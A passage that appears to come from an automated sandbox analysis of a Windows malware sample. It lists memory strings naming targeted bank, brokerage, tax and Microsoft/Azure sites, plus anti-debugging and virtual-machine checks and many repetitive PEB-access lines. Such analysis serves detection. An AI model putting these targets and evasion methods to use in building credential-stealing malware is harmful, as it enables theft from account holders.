                Source: runonce.exe, 00000007.00000002.2626292695.0000000007652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ebrokers.co.inVMware20,11696492231d
                Source: runonce.exe, 00000007.00000002.2626292695.0000000007652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware
                Source: 6511-iOQ--.7.drBinary or memory string: global block list test formVMware20,11696492231
                Source: runonce.exe, 00000007.00000002.2626292695.0000000007652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11
                Source: 6511-iOQ--.7.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: 6511-iOQ--.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 6511-iOQ--.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: 6511-iOQ--.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: runonce.exe, 00000007.00000002.2626292695.0000000007652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tVMware20,11696492231
                Source: 6511-iOQ--.7.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: runonce.exe, 00000007.00000002.2626292695.0000000007652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696492231o
                Source: runonce.exe, 00000007.00000002.2626292695.0000000007652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: block list test formVMware20,11696492231
                Source: 6511-iOQ--.7.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: runonce.exe, 00000007.00000002.2626292695.0000000007652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EU WestVMware20,11696492231n
                Source: runonce.exe, 00000007.00000002.2626292695.0000000007652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ive Brokers - GDCDYNVMware20,11696492231
                Source: 6511-iOQ--.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: runonce.exe, 00000007.00000002.2626292695.0000000007652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: re.comVMware20,11696492231
                Source: 6511-iOQ--.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: 6511-iOQ--.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 6511-iOQ--.7.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: runonce.exe, 00000007.00000002.2626292695.0000000007652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696492231@
                Source: runonce.exe, 00000007.00000002.2621389939.000000000070A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&(
                Source: 6511-iOQ--.7.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: 6511-iOQ--.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 6511-iOQ--.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: 6511-iOQ--.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A096E rdtsc 4_2_017A096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00417A93 LdrLoadDll,4_2_00417A93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01804180 mov eax, dword ptr fs:[00000030h]4_2_01804180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01804180 mov eax, dword ptr fs:[00000030h]4_2_01804180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0181C188 mov eax, dword ptr fs:[00000030h]4_2_0181C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0181C188 mov eax, dword ptr fs:[00000030h]4_2_0181C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01766154 mov eax, dword ptr fs:[00000030h]4_2_01766154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01766154 mov eax, dword ptr fs:[00000030h]4_2_01766154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175C156 mov eax, dword ptr fs:[00000030h]4_2_0175C156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F8158 mov eax, dword ptr fs:[00000030h]4_2_017F8158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F4144 mov eax, dword ptr fs:[00000030h]4_2_017F4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F4144 mov eax, dword ptr fs:[00000030h]4_2_017F4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F4144 mov ecx, dword ptr fs:[00000030h]4_2_017F4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F4144 mov eax, dword ptr fs:[00000030h]4_2_017F4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F4144 mov eax, dword ptr fs:[00000030h]4_2_017F4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_018261C3 mov eax, dword ptr fs:[00000030h]4_2_018261C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_018261C3 mov eax, dword ptr fs:[00000030h]4_2_018261C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01790124 mov eax, dword ptr fs:[00000030h]4_2_01790124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_018361E5 mov eax, dword ptr fs:[00000030h]4_2_018361E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017901F8 mov eax, dword ptr fs:[00000030h]4_2_017901F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180E10E mov eax, dword ptr fs:[00000030h]4_2_0180E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180E10E mov ecx, dword ptr fs:[00000030h]4_2_0180E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180E10E mov eax, dword ptr fs:[00000030h]4_2_0180E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180E10E mov eax, dword ptr fs:[00000030h]4_2_0180E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180E10E mov ecx, dword ptr fs:[00000030h]4_2_0180E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180E10E mov eax, dword ptr fs:[00000030h]4_2_0180E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180E10E mov eax, dword ptr fs:[00000030h]4_2_0180E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180E10E mov ecx, dword ptr fs:[00000030h]4_2_0180E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180E10E mov eax, dword ptr fs:[00000030h]4_2_0180E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180E10E mov ecx, dword ptr fs:[00000030h]4_2_0180E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01820115 mov eax, dword ptr fs:[00000030h]4_2_01820115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180A118 mov ecx, dword ptr fs:[00000030h]4_2_0180A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180A118 mov eax, dword ptr fs:[00000030h]4_2_0180A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180A118 mov eax, dword ptr fs:[00000030h]4_2_0180A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180A118 mov eax, dword ptr fs:[00000030h]4_2_0180A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DE1D0 mov eax, dword ptr fs:[00000030h]4_2_017DE1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DE1D0 mov eax, dword ptr fs:[00000030h]4_2_017DE1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DE1D0 mov ecx, dword ptr fs:[00000030h]4_2_017DE1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DE1D0 mov eax, dword ptr fs:[00000030h]4_2_017DE1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DE1D0 mov eax, dword ptr fs:[00000030h]4_2_017DE1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E019F mov eax, dword ptr fs:[00000030h]4_2_017E019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E019F mov eax, dword ptr fs:[00000030h]4_2_017E019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E019F mov eax, dword ptr fs:[00000030h]4_2_017E019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E019F mov eax, dword ptr fs:[00000030h]4_2_017E019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175A197 mov eax, dword ptr fs:[00000030h]4_2_0175A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175A197 mov eax, dword ptr fs:[00000030h]4_2_0175A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175A197 mov eax, dword ptr fs:[00000030h]4_2_0175A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01834164 mov eax, dword ptr fs:[00000030h]4_2_01834164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01834164 mov eax, dword ptr fs:[00000030h]4_2_01834164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A0185 mov eax, dword ptr fs:[00000030h]4_2_017A0185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178C073 mov eax, dword ptr fs:[00000030h]4_2_0178C073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01762050 mov eax, dword ptr fs:[00000030h]4_2_01762050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E6050 mov eax, dword ptr fs:[00000030h]4_2_017E6050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_018260B8 mov eax, dword ptr fs:[00000030h]4_2_018260B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_018260B8 mov ecx, dword ptr fs:[00000030h]4_2_018260B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F6030 mov eax, dword ptr fs:[00000030h]4_2_017F6030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175A020 mov eax, dword ptr fs:[00000030h]4_2_0175A020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175C020 mov eax, dword ptr fs:[00000030h]4_2_0175C020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0177E016 mov eax, dword ptr fs:[00000030h]4_2_0177E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0177E016 mov eax, dword ptr fs:[00000030h]4_2_0177E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0177E016 mov eax, dword ptr fs:[00000030h]4_2_0177E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0177E016 mov eax, dword ptr fs:[00000030h]4_2_0177E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E4000 mov ecx, dword ptr fs:[00000030h]4_2_017E4000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01802000 mov eax, dword ptr fs:[00000030h]4_2_01802000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01802000 mov eax, dword ptr fs:[00000030h]4_2_01802000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01802000 mov eax, dword ptr fs:[00000030h]4_2_01802000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01802000 mov eax, dword ptr fs:[00000030h]4_2_01802000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01802000 mov eax, dword ptr fs:[00000030h]4_2_01802000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01802000 mov eax, dword ptr fs:[00000030h]4_2_01802000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01802000 mov eax, dword ptr fs:[00000030h]4_2_01802000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01802000 mov eax, dword ptr fs:[00000030h]4_2_01802000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175C0F0 mov eax, dword ptr fs:[00000030h]4_2_0175C0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A20F0 mov ecx, dword ptr fs:[00000030h]4_2_017A20F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0175A0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E60E0 mov eax, dword ptr fs:[00000030h]4_2_017E60E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017680E9 mov eax, dword ptr fs:[00000030h]4_2_017680E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E20DE mov eax, dword ptr fs:[00000030h]4_2_017E20DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017580A0 mov eax, dword ptr fs:[00000030h]4_2_017580A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F80A8 mov eax, dword ptr fs:[00000030h]4_2_017F80A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176208A mov eax, dword ptr fs:[00000030h]4_2_0176208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E035C mov eax, dword ptr fs:[00000030h]4_2_017E035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E035C mov eax, dword ptr fs:[00000030h]4_2_017E035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E035C mov eax, dword ptr fs:[00000030h]4_2_017E035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E035C mov ecx, dword ptr fs:[00000030h]4_2_017E035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E035C mov eax, dword ptr fs:[00000030h]4_2_017E035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E035C mov eax, dword ptr fs:[00000030h]4_2_017E035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0181C3CD mov eax, dword ptr fs:[00000030h]4_2_0181C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_018043D4 mov eax, dword ptr fs:[00000030h]4_2_018043D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_018043D4 mov eax, dword ptr fs:[00000030h]4_2_018043D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180E3DB mov eax, dword ptr fs:[00000030h]4_2_0180E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180E3DB mov eax, dword ptr fs:[00000030h]4_2_0180E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180E3DB mov ecx, dword ptr fs:[00000030h]4_2_0180E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180E3DB mov eax, dword ptr fs:[00000030h]4_2_0180E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175C310 mov ecx, dword ptr fs:[00000030h]4_2_0175C310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01780310 mov ecx, dword ptr fs:[00000030h]4_2_01780310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179A30B mov eax, dword ptr fs:[00000030h]4_2_0179A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179A30B mov eax, dword ptr fs:[00000030h]4_2_0179A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179A30B mov eax, dword ptr fs:[00000030h]4_2_0179A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017963FF mov eax, dword ptr fs:[00000030h]4_2_017963FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0177E3F0 mov eax, dword ptr fs:[00000030h]4_2_0177E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0177E3F0 mov eax, dword ptr fs:[00000030h]4_2_0177E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0177E3F0 mov eax, dword ptr fs:[00000030h]4_2_0177E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017703E9 mov eax, dword ptr fs:[00000030h]4_2_017703E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017703E9 mov eax, dword ptr fs:[00000030h]4_2_017703E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017703E9 mov eax, dword ptr fs:[00000030h]4_2_017703E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017703E9 mov eax, dword ptr fs:[00000030h]4_2_017703E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017703E9 mov eax, dword ptr fs:[00000030h]4_2_017703E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017703E9 mov eax, dword ptr fs:[00000030h]4_2_017703E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017703E9 mov eax, dword ptr fs:[00000030h]4_2_017703E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017703E9 mov eax, dword ptr fs:[00000030h]4_2_017703E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01838324 mov eax, dword ptr fs:[00000030h]4_2_01838324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01838324 mov ecx, dword ptr fs:[00000030h]4_2_01838324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01838324 mov eax, dword ptr fs:[00000030h]4_2_01838324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01838324 mov eax, dword ptr fs:[00000030h]4_2_01838324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017683C0 mov eax, dword ptr fs:[00000030h]4_2_017683C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017683C0 mov eax, dword ptr fs:[00000030h]4_2_017683C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017683C0 mov eax, dword ptr fs:[00000030h]4_2_017683C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017683C0 mov eax, dword ptr fs:[00000030h]4_2_017683C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A3C0 mov eax, dword ptr fs:[00000030h]4_2_0176A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A3C0 mov eax, dword ptr fs:[00000030h]4_2_0176A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A3C0 mov eax, dword ptr fs:[00000030h]4_2_0176A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A3C0 mov eax, dword ptr fs:[00000030h]4_2_0176A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A3C0 mov eax, dword ptr fs:[00000030h]4_2_0176A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A3C0 mov eax, dword ptr fs:[00000030h]4_2_0176A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E63C0 mov eax, dword ptr fs:[00000030h]4_2_017E63C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0183634F mov eax, dword ptr fs:[00000030h]4_2_0183634F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0182A352 mov eax, dword ptr fs:[00000030h]4_2_0182A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01808350 mov ecx, dword ptr fs:[00000030h]4_2_01808350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01758397 mov eax, dword ptr fs:[00000030h]4_2_01758397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01758397 mov eax, dword ptr fs:[00000030h]4_2_01758397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01758397 mov eax, dword ptr fs:[00000030h]4_2_01758397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178438F mov eax, dword ptr fs:[00000030h]4_2_0178438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178438F mov eax, dword ptr fs:[00000030h]4_2_0178438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180437C mov eax, dword ptr fs:[00000030h]4_2_0180437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175E388 mov eax, dword ptr fs:[00000030h]4_2_0175E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175E388 mov eax, dword ptr fs:[00000030h]4_2_0175E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175E388 mov eax, dword ptr fs:[00000030h]4_2_0175E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01764260 mov eax, dword ptr fs:[00000030h]4_2_01764260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01764260 mov eax, dword ptr fs:[00000030h]4_2_01764260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01764260 mov eax, dword ptr fs:[00000030h]4_2_01764260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175826B mov eax, dword ptr fs:[00000030h]4_2_0175826B
